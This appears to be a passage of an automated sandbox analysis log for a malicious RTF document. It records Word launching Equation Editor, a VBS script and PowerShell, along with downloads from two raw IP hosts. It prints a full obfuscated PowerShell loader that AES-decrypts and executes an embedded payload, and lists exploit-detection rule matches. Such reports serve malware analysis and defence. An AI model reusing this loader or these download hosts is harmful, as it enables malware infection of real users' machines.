    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB8AA8CB-8FAF-49D2-85AB-EABFDC1D3893}.tmpJump to behavior
    Source: global trafficHTTP traffic detected: GET /46/seethemoononlinetoseebeautygirl.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
    Source: EQNEDT32.EXE, 00000002.00000002.353863921.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIF
    Source: EQNEDT32.EXE, 00000002.00000002.353863921.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.11/46/seethemoononlinetoseebeautygirl.gIFj
    Source: powershell.exe, 00000006.00000002.453486758.000000000253B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
    Source: powershell.exe, 00000006.00000002.453486758.000000000253B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
    Source: powershell.exe, 00000006.00000002.453486758.0000000002BB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 00000006.00000002.453239145.000000000024C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
    Source: powershell.exe, 00000006.00000002.454171582.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000006.00000002.453486758.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000006.00000002.454171582.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.454171582.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.454171582.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000006.00000002.454171582.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    barindex
    Source: e2VMPAayU1.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 2160, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029BE502_2_0029BE50
    Source: ~WRF{9681AC94-218C-447B-8B38-4F8B3535CB8F}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: e2VMPAayU1.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
    Source: Process Memory Space: powershell.exe PID: 2160, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
    Source: classification engineClassification label: mal100.expl.evad.winRTF@6/17@0/2
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$VMPAayU1.rtfJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR734B.tmpJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................................................................T..........s......C.....Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................................H.C.......................C.....Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................F.a.i.l.e.d. .T.o. .d.o.w.n.l.o.a.d. .d.a.t.a. .f.r.o.m. .$.l.i.n.k.............H.C.....D.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................n.k.............H.C.............................Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: e2VMPAayU1.rtfReversingLabs: Detection: 66%
    Source: e2VMPAayU1.rtfVirustotal: Detection: 51%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5E